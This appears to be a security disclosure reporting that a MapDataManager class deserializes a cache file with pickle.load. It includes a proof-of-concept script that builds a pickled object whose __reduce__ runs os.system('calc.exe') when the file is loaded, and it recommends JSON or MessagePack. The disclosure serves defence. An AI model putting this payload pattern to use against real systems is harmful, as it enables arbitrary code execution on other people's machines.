Insecure Deserialization Vulnerability in DataManager

[EDMPL]

Hi,

I've discovered a critical vulnerability in the MapDataManager class where pickle.load is used to deserialize cached data from a file. The use of pickle is inherently unsafe as it can execute arbitrary Python code during deserialization. This poses a significant risk, such as enabling remote code execution (RCE) by deserializing malicious objects.

PoC

Below is a simple PoC for this issue, I also attach a picture with 'dir' payload for your reference.

import pickle
import os
from modelcache.manager import get_data_manager

# Malicious class that executes arbitrary code when deserialized
class Exploit:
    def __reduce__(self):
        return (os.system, ('calc.exe',))  # calc.exe for windows

malicious_payload = pickle.dumps(Exploit())

with open("data_map.txt", "wb") as f: #Using data_map.txt like in factory.py
    f.write(malicious_payload)

# Simulate loading the malicious cache file
data_manager = get_data_manager(data_path="data_map.txt", max_size=1000)

While the example Flask application uses SQLite as the cache base, similar risks could arise if user-controlled data is cached into the database and subsequently deserialized.

Recommendation

To mitigate this issue, I strongly recommend avoiding pickle for serialization. Safer alternatives like JSON or MessagePack should be used, as they do not allow code execution.

Thanks.